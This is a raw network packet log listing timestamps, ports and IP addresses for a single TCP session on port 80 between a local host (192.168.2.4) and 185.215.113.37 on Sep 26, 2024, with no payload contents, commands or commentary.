Sep 26, 2024 18:27:11.533405066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533454895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533458948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533488035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533508062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533519983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533538103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533557892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533588886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533590078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533616066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533622980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533637047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533654928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533669949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533689976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533705950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533726931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533740044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533796072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657123089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657171965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657243013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657248974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657284021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657311916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657311916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657318115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657342911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657366037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657373905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657407045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657442093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657444000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657465935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657475948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657495975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657510996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657533884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657562017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657577038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657612085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657627106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657664061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657668114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657704115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657718897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657747984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657758951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657798052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657802105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657828093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657850981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657867908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657874107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657902002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657921076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657933950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.657951117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.657967091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658005953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658015013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658015013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658040047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658052921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658071995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658086061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658104897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658119917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658138037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658160925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658170938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658185005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658206940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658227921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658238888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658263922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658271074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658286095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658303976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658323050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658335924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658375978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658376932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658396006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658427000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658432961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658458948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658476114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658492088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658514977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658524036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658535957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658557892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658576965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658590078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658612967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658622980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658649921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658658028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658674955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658693075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658713102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658742905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658771038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658777952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658795118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658827066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658828020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658863068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658885956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658894062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658910990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658929110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658952951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.658958912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658993006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.658996105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.659013987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.659028053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.659054995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.659079075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783452034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783524036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783543110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783561945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783577919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783597946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783632994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783633947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783663034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783685923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783687115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783723116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783747911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783755064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783775091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783790112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783813000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783823013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783837080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783859015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783876896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783890963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783915997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783924103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783957005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.783957958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.783992052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784008980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784010887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784050941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784066916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784085989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784105062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784117937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784142017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784164906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784173965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784198046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784219027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784230947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784259081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784266949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784281015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784303904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784320116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784338951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784358025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784372091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784394979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784404993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784425020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784439087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784461021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784471989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784496069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784522057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784526110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784554958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784586906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784590006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784615040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784621954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784641981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784653902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784673929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784691095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784729958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784748077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784873962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784907103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784939051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.784940004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784959078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.784971952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785001040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785017967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785038948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785082102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785116911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785125971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785140038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785171032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785191059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785212994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785226107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785254002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785264015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785298109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785310984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785350084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785377979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785428047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785589933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785631895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785648108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785675049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785684109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785717964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785759926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785784960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785801888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785804033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785821915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785845995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785852909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785887957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785909891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785929918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.785943985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785993099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.785999060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786041021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786056995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786086082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786099911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786124945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786144972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786169052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786181927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786236048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786304951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786346912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786358118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786389112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786402941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786432028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786444902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786489010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786495924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786540031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786552906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786583900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786595106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786627054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786654949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786667109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786695004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786710978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786725044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786755085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786768913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786820889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786822081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786864042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786895037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786907911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.786912918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786959887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.786971092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787019968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787041903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787060976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787081003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787103891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787120104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787147045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787158012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787189960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787205935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787233114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787250042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787275076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787317991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787348032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787348032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787359953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787372112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787434101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787452936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787494898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787509918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787537098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787550926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787580967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787592888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787630081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.787636995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.787682056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.870127916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.870172977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.870208979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.870284081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.906184912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906218052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906232119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906261921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.906322956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.906405926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906420946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906436920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906450987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906461000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.906498909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.906519890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906534910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906548977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906563044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906574965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.906577110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906593084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906608105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906616926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.906655073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906671047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.906680107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906711102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.906742096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.906820059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906835079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906848907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.906881094 CEST	49730	80	192.168.2.4	185.215.113.37
